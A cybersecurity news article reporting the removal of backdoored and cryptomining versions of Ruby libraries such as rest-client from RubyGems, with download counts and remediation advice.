The RubyGems package repository maintenance team recently announced the removal of at least 18 malicious versions of 11 Ruby libraries due to the presence of a backdoor. Web application security experts claim that even cases were detected in which Ruby’s programming projects were infected with cryptocurrency mining malware. This malicious development was discovered just a couple of days ago in four versions of rest-client, a very popular Ruby library.
Reports indicate that this malicious code is
capable of collecting and sending URLs and environment variables from the
targeted system to a remote server, located somewhere in Ukraine. “The
data most exposed to this leak is login credentials, used to access databases,
payment systems, among other platforms,” says Jan Dintel, Ruby maintainer.
As for the backdoor
detected in these libraries, web application security experts mention that it
would allow a threat actor to send a cookie file to the compromised Ruby
project, which would create the necessary conditions to execute malicious
commands.
RubyGems maintainers also detected that hackers
were abusing this mechanism to inject mining malware into some projects, such
as:
- rest-client,
downloaded 176 times - bitcoin_vanity,
downloaded 8 times - lita_coin,
downloaded 216 times - coming-soon,
downloaded 211 times - omniauth_amazon,
downloaded 193 times
All libraries, except rest-client, were created
by taking another fully functional library, adding the malicious code and then
reloading it into RubyGems under a different name. Those responsible for these
actions remained active in RubyGems for more than a month without anyone
detecting their presence or actions.
Finally, the operators of this campaign were
detected after gaining access to the account of one of the rest-client
developers, which was used to power four malicious versions of the distribution
into RubyGems. For web application security specialists, threat actors made a
serious mistake in attacking such a relevant project in RubyGems, which has
more than 113 million downloads. “This drew too much attention, so this
scheme was dismantled a few hours after this activity was detected,” they
added.
Despite the intervention of rest-client
managers, the 18 malicious versions of the library were downloaded about 3,600
times before being removed from the platform, so the problem is not yet over.
International Institute of Cyber Security
(IICS) web application security experts recommend project administrators using
these libraries to remove the malicious version or, if necessary, upgrade or
downgrade to a secure to use version. Other experts have detected the presence
of similar backdoors in RubyGems before; specifically in the Bootstrao-Sass and
strong_password projects. Although they are somewhat similar, researchers still
do not determine whether there is any link between these security risks on the
platform.
